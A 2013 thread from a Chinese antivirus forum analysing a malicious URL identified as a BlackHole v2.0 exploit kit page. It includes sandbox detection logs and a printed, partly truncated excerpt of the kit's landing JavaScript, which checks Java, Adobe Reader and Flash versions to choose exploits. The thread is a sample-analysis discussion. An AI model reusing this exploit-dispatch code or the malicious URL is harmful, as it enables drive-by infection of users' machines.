查看: 922|回复: 6
收起左侧

[未鉴定] http://pricesgettos.info/news/done-heavy_hall_meant.php

[复制链接]
墨家小子
发表于 2013-4-24 23:54:50 | 显示全部楼层 |阅读模式
1.PNG

2.PNG

3.PNG

4.PNG

3162150.zip (96.93 KB, 下载次数: 6)
墨家小子
 楼主| 发表于 2013-4-24 23:56:53 | 显示全部楼层
BlackHole v2.0 exploit kit
墨家小子
 楼主| 发表于 2013-4-25 00:03:39 | 显示全部楼层
2013/4/25        0:02:29        已删除         l\AA        C:\Program Files (x86)\Java\jre7\bin\java.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Temp\jar_cache5834527954065524217.tmp        JV/Blacole-FIB!4BCECFA4F023 (特洛伊)
2013/4/25        0:02:33        已删除         l\AA        C:\Program Files (x86)\Java\jre7\bin\java.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Temp\jar_cache7670298996138828538.tmp        JV/Blacole-FIB!4BCECFA4F023 (特洛伊)
2013/4/25        0:02:36        已删除         l\AA        C:\Program Files (x86)\Java\jre7\bin\java.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Temp\jar_cache5252798909149043406.tmp        JV/Blacole-FIB!4BCECFA4F023 (特洛伊)
2013/4/25        0:02:39        已删除         l\AA        C:\Program Files (x86)\Java\jre7\bin\java.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Temp\jar_cache2679855951151927195.tmp        JV/Blacole-FIB!4BCECFA4F023 (特洛伊)
dayangyang
发表于 2013-4-25 00:03:56 | 显示全部楼层
和刚才那个一样
BlackHole
比较猥琐的是吧加密内容防到了body 和div元素里。。借此躲避某些静态检测
  1. pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return function(){c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d[b])&&/[^\s]/.test(d[b])){f=navigator.mimeTypes[d[b]];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}...ction p3(){return false;}function f1(){return false;}function ff2(){return false;}document.write('');setTimeout(end_redirect,61000);var pdfver=[];function svwrbew6436b($){var ar = [];var javax = ($.getVersion("Ja"+"va")+".").toString()["split"](".");if ($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==7&&javax[3]<9))){ar["push"](j2);} else if($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==6&&javax[3]<33)||(javax[0]==1&&javax[1]<6))){ar["push"](j1);}pdfver=pdpd.getVersion("AdobeReader");if(window.document)if(typeof pdfver=="string"){pdfver=pdfver["split"](".")}else{pdfver=[0,0,0,0]}if(pdfver[0]>0&&pdfver[0]<8){if(window.document)ar["push"](p1);}if (((pdfver[0]==9)&&(pdfver[1]>=3))||((pdfver[0]==10)&&(pdfver[1]<103))) {ar["push"](p3);} else {if(window.document&&(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4))){ar["push"](p2);}}var ver = ($.getVersion("Flash")+".").toString()["split"](".");if (((ver[0]==10&&ver[1]==0&&ver[2]>40)||(window.document&&(ver[0]==10&&ver[1]>0)&&(ver[0]==10&&ver[1]<2)))||window.document&&((ver[0]==10&&ver[1]==2&&ver[2]<159)||(ver[0]==10&&ver[1]<2))){ar["push"](ff2);}if((ver[0]==10&&ver[1]==3&&ver[2]==181&&ver[3]<=23)||(ver[0]==10&&ver[1]==3&&ver[2]<181)){ar["push"](f1);}var arcalli=0;var arcall = function(){if(ar.length<=arcalli)return 123;ss=setTimeout;var res=ar[arcalli]();arcalli++;if(res&&window.document){ss(function(){arcall()},5509);}else{arcall();}};arcall();}$["onDetec"+"tionDone"]("Ja"+"va", svwrbew6436b, "../six/getJavaInfo.jar");
复制代码
iyinyt
发表于 2013-4-25 12:35:50 | 显示全部楼层
墨家小子 发表于 2013-4-25 00:03
2013/4/25        0:02:29        已删除         l\AA        C:\Program Files (x86)\Java\jre7\bin\java.exe        C:\Sandbox\AA\IE\user\c ...

请问楼主这个用的什么杀毒软件检测的呢?
墨家小子
 楼主| 发表于 2013-4-25 12:43:22 | 显示全部楼层
iyinyt 发表于 2013-4-25 12:35
请问楼主这个用的什么杀毒软件检测的呢?

11.PNG
iyinyt
发表于 2013-4-25 14:33:44 | 显示全部楼层
墨家小子 发表于 2013-4-25 12:43

嗯 谢谢解答。这个咖啡对网马很厉害吗?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 20:58 , Processed in 0.145064 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表